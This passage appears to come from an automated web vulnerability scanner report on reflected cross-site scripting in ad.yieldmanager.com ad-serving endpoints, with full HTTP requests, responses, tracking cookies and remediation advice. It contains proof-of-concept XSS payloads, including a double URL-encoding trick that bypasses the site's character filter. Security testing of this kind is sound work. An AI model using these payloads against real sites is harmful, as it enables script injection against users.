Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!*!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$%ST~!%.B?!1UC$!%`n`!!!!$!?5%!$8o10!ZmB)!'mla!'me'~~~~~~=$G!==%EaVM.jTN!#+s2!,x.^!%)<k!0)2c!$tyl!6Z#3!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Jsh='HAD!!!([!#2Jp!,x.^!%)<k!2A@,!$u!!!7MU<!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Ju6='T?<!!!([!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!#Jl?!,x.^!%)<k!.#:A!%IaL!H<'$!?5%!(L(6:!w1K*!(#l)!#Ae[!%f(g~~~~~=$L#)=%JbC!!!([!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; ih="b!!!!E!'4@g!!!!#=$KA3!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.`.U!!!!#='htS!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2"; vuday1=Gf(n`NBHr8*mOw]; bh="b!!!%*!!!?J!!!!(=$_d[!!(1-!!!!+=%=]S!!*lZ!!!!#=$Wj6!!*oY!!!!$=%@(m!!,WM!!!!#=$Wj6!!-?2!!!!)=%@(m!!-O3!!!!)=%@(m!!..X!!!!'=$L=p!!/GK!!!!+=%=]S!!/GR!!!!+=%=]S!!/Ju!!!!#=$_d[!!/K$!!!!%=%=]S!!/i,!!!!*=%@(m!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!*=%@(m!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!%=%=]S!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!,=%=]S!!J<K!!!!,=%=]S!!J<O!!!!*=%=]S!!J<S!!!!,=%=]S!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!*=%@(m!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!$=%@(m!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!)=%@(m!!Zwb!!!!$=%@(m!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!,=%=]S!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!$=%@(m!!kl,!!!!$=%@(m!!mL?!!!!#=%=pu!!mo!!!!!$=%@(m!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!$=%@(m!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!*=%@(m!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!*=%=]S!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!*=%=]S!#MTF!!!!'=%=]S!#MTH!!!!,=%=]S!#MTI!!!!,=%=]S!#MTJ!!!!,=%=]S!#Nyi!!!!#=!eq^!#O29!!!!(=%@(m!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!*=%@(m!#Sq>!!!!#='>m<!#T,d~~!#T^F!!!!#=!yv!!#UDQ!!!!,=%=]S!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!$=%@(m!#Z8E!!!!)=%@(m!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Z!!!!!(=%@(m!#]Z#!!!!$=%@(m!#]w)!!!!*=%=]S!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!*=%@(m!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!)=%@(m!#`-Z!!!!$=%=]S!#`-[!!!!$=%=]S!#`U0!!!!$=%@(m!#`cS!!!!#=%id8!#a=6!!!!$=%@(m!#a=7!!!!$=%@(m!#a=9!!!!$=%@(m!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#bj8!!!!#=#mS:!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!(=%@(m!#c8X!!!!(=%@(m!#c8c!!!!(=%@(m!#c8i!!!!(=%@(m!#c8m!!!!(=%@(m!#c8p!!!!(=%@(m!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!)=%@(m!#fBk!!!!)=%@(m!#fBm!!!!)=%@(m!#fBn!!!!)=%@(m!#fFG!!!!#=#T_g!#fG)!!!!$=%@(m!#fG+!!!!$=%@(m!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!*=%@(m!#g=r!!!!$=%@(m!#gsl!!!!#=#mS:!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#k]0!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!*=%=]S!#uR3!!!!$=%@(m!#uR7!!!!)=%@(m!#uRN!!!!#=#mS:!#uRP!!!!#=#mS:!#uY<!!!!#=!yv$!#v,U!!!!#=#mS:!#v,Y!!!!#=#mS:!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#9a!!!!#=%j],!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#X4!!!!#=#%VO!$#yu!!!!*=%=]S!$$K<!!!!#=#$.g!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!$=%@(m!$(!P!!!!)=%@(m!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!$=%@(m!$+Dr!!!!#=#mS:!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-,y!!!!#=#mS:!$-kY!!!!#=#mS:!$-kv!!!!#=#mS:!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5"; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:03:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:03:32 GMT
Pragma: no-cache
Content-Length: 4724
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=160x600&b1cfe"><script>alert(1)</script>b25c941bd8e=1&s=806254&_salt=4127608432&t=2" target="_parent">
...[SNIP]...

4.43. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f866"-alert(1)-"91e191e34f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=160x600&section=1812134&9f866"-alert(1)-"91e191e34f5=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://adopt.imiclk.com/emb/q?01AD=2-2-B0214141DED1291A4FF0463D9E06444BD5100362C216DF15CC667F2767BC1758-991AD395E12A9826D82DE593D62CFBCFAE28214D0237D0E3F7994E1DF381CB11&01RI=6BDF326C1D1D9D9&01NA=&size=160x600&m=3&l=1575606&c=162
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!*!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$%ST~!%.B?!1UC$!%`n`!!!!$!?5%!$8o10!ZmB)!'mla!'me'~~~~~~=$G!==%EaVM.jTN!#+s2!,x.^!%)<k!0)2c!$tyl!6Z#3!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Jsh='HAD!!!([!#2Jp!,x.^!%)<k!2A@,!$u!!!7MU<!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Ju6='T?<!!!([!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!#Jl?!,x.^!%)<k!.#:A!%IaL!H<'$!?5%!(L(6:!w1K*!(#l)!#Ae[!%f(g~~~~~=$L#)=%JbC!!!([!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; bh="b!!!%*!!!?J!!!!(=$_d[!!(1-!!!!+=%=]S!!*lZ!!!!#=$Wj6!!*oY!!!!$=%@(m!!,WM!!!!#=$Wj6!!-?2!!!!)=%@(m!!-O3!!!!)=%@(m!!..X!!!!'=$L=p!!/GK!!!!+=%=]S!!/GR!!!!+=%=]S!!/Ju!!!!#=$_d[!!/K$!!!!%=%=]S!!/i,!!!!*=%@(m!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!*=%@(m!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!%=%=]S!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!,=%=]S!!J<K!!!!,=%=]S!!J<O!!!!*=%=]S!!J<S!!!!,=%=]S!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!*=%@(m!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!$=%@(m!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!)=%@(m!!Zwb!!!!$=%@(m!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!,=%=]S!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!$=%@(m!!kl,!!!!$=%@(m!!mL?!!!!#=%=pu!!mo!!!!!$=%@(m!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!$=%@(m!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!*=%@(m!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!*=%=]S!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!*=%=]S!#MTF!!!!'=%=]S!#MTH!!!!,=%=]S!#MTI!!!!,=%=]S!#MTJ!!!!,=%=]S!#Nyi!!!!#=!eq^!#O29!!!!(=%@(m!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!*=%@(m!#Sq>!!!!#='>m<!#T,d~~!#T^F!!!!#=!yv!!#UDQ!!!!,=%=]S!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!$=%@(m!#Z8E!!!!)=%@(m!#]%`!!!!#=#33)!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Z!!!!!(=%@(m!#]Z#!!!!$=%@(m!#]w)!!!!*=%=]S!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!*=%@(m!#^d6!!!!#=#33)!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!)=%@(m!#`-Z!!!!$=%=]S!#`-[!!!!$=%=]S!#`U0!!!!$=%@(m!#`cS!!!!#=%id8!#a=6!!!!$=%@(m!#a=7!!!!$=%@(m!#a=9!!!!$=%@(m!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#bj8!!!!#=#mS:!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!(=%@(m!#c8X!!!!(=%@(m!#c8c!!!!(=%@(m!#c8i!!!!(=%@(m!#c8m!!!!(=%@(m!#c8p!!!!(=%@(m!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!)=%@(m!#fBk!!!!)=%@(m!#fBm!!!!)=%@(m!#fBn!!!!)=%@(m!#fFG!!!!#=#T_g!#fG)!!!!$=%@(m!#fG+!!!!$=%@(m!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!*=%@(m!#g=r!!!!$=%@(m!#gsl!!!!#=#mS:!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#k]0!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!*=%=]S!#uR3!!!!$=%@(m!#uR7!!!!)=%@(m!#uRN!!!!#=#mS:!#uRP!!!!#=#mS:!#uY<!!!!#=!yv$!#v,U!!!!#=#mS:!#v,Y!!!!#=#mS:!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#9a!!!!#=%j],!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#X4!!!!#=#%VO!$#yu!!!!*=%=]S!$$K<!!!!#=#$.g!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!$=%@(m!$(!P!!!!)=%@(m!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!$=%@(m!$+Dr!!!!#=#mS:!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-,y!!!!#=#mS:!$-kY!!!!#=#mS:!$-kv!!!!#=#mS:!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5"; ih="b!!!!F!'4@g!!!!#=$KA3!)AU6!!!!#='htn!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.`.U!!!!#='htS!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2"; vuday1=!!!!#Gf(n`NBHr8H)J%d; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:03:29 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:03:29 GMT
Pragma: no-cache
Content-Length: 4324
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.yieldmanager.com/imp?9f866"-alert(1)-"91e191e34f5=1&Z=160x600&s=1812134&_salt=880973763";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar
...[SNIP]...

4.44. http://ad.yieldmanager.com/v0/admeld-match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /v0/admeld-match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 963e2%2527%253balert%25281%2529%252f%252fb76a6b65442 was submitted in the admeld_callback parameter. This input was echoed as 963e2';alert(1)//b76a6b65442 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the admeld_callback request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /v0/admeld-match?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=420&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match963e2%2527%253balert%25281%2529%252f%252fb76a6b65442 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; pv1="b!!!!'!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!#Jl?!$5*F!$uj6!.#:D!%^Pa!!!!$!?5%!$8Ip,!@Dj0!'jh]~~~~~~~='htp=(g[2!!!(["; ih="b!!!!J!'4@g!!!!#=$KA3!)AU6!!!!#='htn!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!/JVV!!!!#='i!H!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2`+,!!!!#='hw!!2gH2!!!!#='i#o"; vuday1=!!!!#?:rWHV9*LS4M6EqGf(n`NBHr8)FyuX; lifb=3i)1!_N/#u8_XTjv=)DUs169g; bh="b!!!%.!!!?J!!!!)='htq!!(1-!!!!,='htq!!*10!!!!#='hvv!!*lZ!!!!#=$Wj6!!*oY!!!!%='hvv!!,WM!!!!#=$Wj6!!-?2!!!!*='hvv!!..X!!!!'=$L=p!!/GK!!!!,='htq!!/GR!!!!,='htq!!/Ju!!!!$='htq!!/K$!!!!'='htq!!/i,!!!!+='hvv!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!+='hvv!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!'='htq!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!-='htq!!J<K!!!!-='htq!!J<O!!!!+='htq!!J<S!!!!-='htq!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!+='hvv!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!%='hvv!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!*='hvv!!Zwb!!!!%='hvv!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!-='htq!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!%='hvv!!kl,!!!!%='hvv!!mL?!!!!#=%=pu!!mo!!!!!%='hvv!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!%='hvv!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!+='hvv!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#p